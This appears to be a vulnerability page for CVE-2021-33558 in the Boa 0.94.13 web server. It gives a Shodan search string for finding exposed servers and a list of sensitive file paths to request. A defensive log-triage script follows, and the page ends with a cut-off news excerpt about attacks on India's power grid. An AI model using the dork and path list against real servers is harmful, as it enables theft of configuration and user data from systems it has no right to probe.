CVE-2021-33558 POC
CVE-2021-33558
Reference: www.cvedetails.com/cve/CVE-2021-33558
Shodan dork: product:"Boa Web Server" 0.94.13
Payload: /backup.html /preview.html /js/log.js /log.html /email.html /online-users.html /config.js
POC:
Boa 0.94.13 allows remote malicious users to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE: multiple third parties report that this is a site-specific issue because those files are not part of Boa.
Vulnerable Product |
---|
boa boa 0.94.13 |
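A defender-side check for the exposure described above, as an added example that is not part of the original page: it triages web access-log lines for requests to the seven listed paths and separates 2xx responses (the file exists on this site and was served) from failed probes. It assumes Common Log Format lines; the function names, sample log and addresses are constructed for illustration.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Paths named in the CVE-2021-33558 description.
SENSITIVE_PATHS = {
    "/backup.html", "/preview.html", "/js/log.js", "/log.html",
    "/email.html", "/online-users.html", "/config.js",
}

# Assumed input: Common Log Format (host ident user [time] "request" status bytes).
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log (documentation-range addresses), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Jun/2021:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 512
198.51.100.7 - - [12/Jun/2021:10:01:05 +0000] "GET /config.js HTTP/1.1" 200 2048
198.51.100.7 - - [12/Jun/2021:10:01:06 +0000] "GET /backup.html HTTP/1.1" 404 0
198.51.100.7 - - [12/Jun/2021:10:01:07 +0000] "GET //js/%6cog.js?x=1 HTTP/1.1" 200 900
203.0.113.4 - - [12/Jun/2021:10:02:00 +0000] "GET /online-users.html HTTP/1.1" 404 0
""".splitlines()

def normalize(target):
    """Drop query/fragment, percent-decode, collapse '//' and '/./' segments."""
    path = unquote(target.split("?", 1)[0].split("#", 1)[0])
    return posixpath.normpath(re.sub(r"/+", "/", path))

def triage(lines):
    """Return {client: {"served": [...], "probed": [...]}} for the listed paths."""
    hits = defaultdict(lambda: {"served": [], "probed": []})
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF line; ignore rather than guess
        path = normalize(m["target"])
        if path not in SENSITIVE_PATHS:
            continue
        # 2xx: the file is present in this deployment and was returned to the client.
        bucket = "served" if m["status"].startswith("2") else "probed"
        hits[m["host"]][bucket].append(path)
    return dict(hits)

if __name__ == "__main__":
    for client, seen in triage(SAMPLE_LOG).items():
        print(client, seen)
```

Any entry under "served" means the file is actually reachable on that host and should be removed from the document root or placed behind authentication.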
Flaws in the open-source tool exploited – and India's power grid was a target
Microsoft is warning that systems using the long-discontinued Boa web server could be at risk of attacks after a series of intrusion attempts of power grid operations in India likely included exploiting security flaws in the technology. Researchers with Microsoft's Security Threat Intelligence unit examined an April report from cybersecurity company Recorded Future about the intrusion efforts into India's power grid dating back to 2020 and, more recently, into a national emergency response syste...